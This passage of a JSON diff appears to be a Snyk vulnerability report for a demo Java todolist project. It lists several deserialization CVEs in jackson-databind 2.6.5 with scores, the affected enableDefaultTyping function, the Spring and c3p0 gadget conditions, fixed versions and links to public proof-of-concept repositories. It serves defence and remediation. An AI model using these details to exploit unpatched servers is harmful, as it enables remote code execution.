"[2.7.0,2.7.9.1)", + "[2.8.0,2.8.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": 
"https://github.com/FasterXML/jackson-databind/commit/e8f043d1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1680", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1737", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1506612", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:13.013603Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:53.619980Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:46.857906Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for 
[CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. 
These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", + "epssDetails": { + "percentile": "0.92802", + "probability": "0.04801", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-15095" + ], + "CWE": [ + "CWE-184" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-11-07T13:13:32.343000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-06-26T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + 
"level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-11-09T03:13:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:46.857906Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Imre Rad" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1855", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/irsl/jackson-rce-via-spel/", + "title": "PoC Project" + } + ], + 
"cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.686860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:06.545272Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.597489Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", + "epssDetails": { + "percentile": "0.95701", + "probability": "0.13977", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-17485" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-11T11:41:28.547000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-10T11:41:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + 
"publicationTime": "2018-01-22T12:30:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:58.597489Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Rui Chong" + ], + "semver": { + "vulnerable": [ + "[,2.8.11)", + "[2.9.0,2.9.4)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.8.11", + "2.9.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1899", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:07.715996Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:48.440088Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:59.857985Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", + "epssDetails": { + "percentile": "0.94704", + "probability": "0.09270", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-5968" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-w3f4-3q6j-rh82" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-01-22T15:40:18.105000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11)", + "[2.9,2.9.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-01-18T15:40:18Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-01-23T13:17:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:59.857985Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.5)", + "[2.7.0, 2.8.11.1)", + "[2.9.0, 2.9.5)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.5", + "2.8.11.1", + "2.9.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1931", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + 
"modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.859910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:58.671582Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.486075Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", + "epssDetails": { + "percentile": "0.99133", + "probability": "0.93631", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-7489" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cggj-fvv3-cqwv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-02-26T15:13:40.723000Z", + "functions_new": [ + { + "version": [ + "[,2.8.11.1)", + "[2.9.0,2.9.5)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-02-10T15:13:40Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-02-26T15:13:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.486075Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.9.1", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [ + { + "version": [ + "[2.9.0,2.9.9.1)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2341", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/Al1ex/CVE-2019-12814", + "title": "PoC Repository" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 5.9, + "modificationTime": "2024-03-11T09:53:36.647712Z" + }, + { + "assigner": "Red Hat", 
